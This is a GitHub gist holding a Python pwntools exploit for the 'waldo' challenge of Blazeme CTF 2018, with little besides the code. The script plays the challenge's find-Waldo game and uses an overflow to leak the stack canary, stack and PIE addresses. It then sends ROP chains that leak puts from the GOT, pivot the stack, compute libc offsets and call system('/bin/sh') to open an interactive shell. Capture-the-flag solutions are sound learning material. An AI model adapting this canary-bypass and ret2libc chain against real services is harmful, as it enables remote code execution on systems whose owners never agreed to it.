Skip to content

Instantly share code, notes, and snippets.

@sudhackar

sudhackar/waldo.py

Created April 25, 2018 16:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sudhackar/c527de2cb94dc06aac5b2163192da660 to your computer and use it in GitHub Desktop.
Save sudhackar/c527de2cb94dc06aac5b2163192da660 to your computer and use it in GitHub Desktop.
Download ZIP
Blazeme ctf 2018 waldo pwn
Raw
waldo.py
from pwn import *
# has some issues, works only 1/2 the times
context(arch='amd64', os='linux', log_level='debug')
# s = remote('127.0.0.1', 5000)
s = remote('waldo.420blaze.in',420)
# raw_input()
s.recvuntil("(y/N) ")
s.sendline("y")
s.recvuntil("? ")
s.sendline("-1 -1")
s.recvuntil("(y/N) ")
s.sendline("y")
def check(c=0):
s.recvline()
x,y = 0,0
cnt = 0
line = s.recvline().strip()
if "W" in line:
x = line.find("W")
y = cnt
size = len(line)
while len(line) > 1:
cnt += 1
line = s.recvline().strip()
if "W" in line:
x = line.find("W")
y = cnt
s.recvuntil("? ")
s.sendline(("%d %d "+("A"*c)) % (y, x))
print (y,x)
for _ in xrange(30):
print _,
check()
print s.recvline()
check(0x78)
print "32"
s.recvline()
s.recvline()
x,y = 0,0
cnt = 0
canary, stack, pie = 0, 0, 0
line = s.recvline().strip()
print line.encode("hex")
if "W" in line:
x = line.find("W")
y = cnt
size = len(line)
if "MA" in line:
l = line.find("MA")
success("found %x %x" %(l, size))
if l+2+8 <= size:
canary = u64(line[l+2:l+10])
if l+2+16 <= size:
stack = u64(line[l+10:l+18])
if l+2+24 <= size:
pie = u64(line[l+18:l+26])
while len(line) > 1:
cnt += 1
line = s.recvline().strip()
print line.encode("hex")
if "W" in line:
x = line.find("W")
y = cnt
size = len(line)
if "MA" in line:
l = line.find("MA")
success("found %x %x" %(l, size))
if l+2+8 <= size and not canary:
canary = u64(line[l+2:l+10])
if l+2+16 <= size and not stack:
stack = u64(line[l+10:l+18])
if l+2+24 <= size and not pie:
pie = u64(line[l+18:l+26])
success("canary %x, stack %x, pie %x" % (canary, stack, pie))
s.recvuntil("? ")
s.sendline(("%d %d") % (y, x))
print (y,x)
print "canary"
x = int(raw_input(), 16)
if x:
canary = x
print "stack"
x = int(raw_input(), 16)
if x:
stack = x
print "pie"
x = int(raw_input(), 16)
if x:
pie = x
# check()
pie = pie - 0xc43
success("canary %x, stack %x, pie %x" % (canary, stack, pie))
e = ELF("./waldo")
payload = "A"*72+p64(canary)+"B"*8
payload += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload += p64(pie+e.got['puts'])
payload += p64(pie+e.plt['puts'])
payload += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload += p64(pie+0x202c00)
payload += p64(pie+e.plt['gets'])
payload += p64(pie+0x000000000000110d) # 0x000000000000110d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
payload += p64(pie+0x202c00)
s.sendline(payload)
s.recvline()
s.recvline()
s.recvline()
y = s.recvline().strip()
y += "\x00"*(8-len(y))
puts_leak = u64(y)
success("puts leak : %x" % puts_leak)
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
payload2 = "A"*24
payload2 += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload2 += p64(puts_leak-offset_puts+offset_str_bin_sh)
payload2 += p64(pie+e.plt['puts'])
payload2 += p64(pie+0x0000000000001113) # 0x0000000000001113 : pop rdi ; ret
payload2 += p64(puts_leak-offset_puts+offset_str_bin_sh)
payload2 += p64(puts_leak-offset_puts+offset_system)
s.sendline(payload2)
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment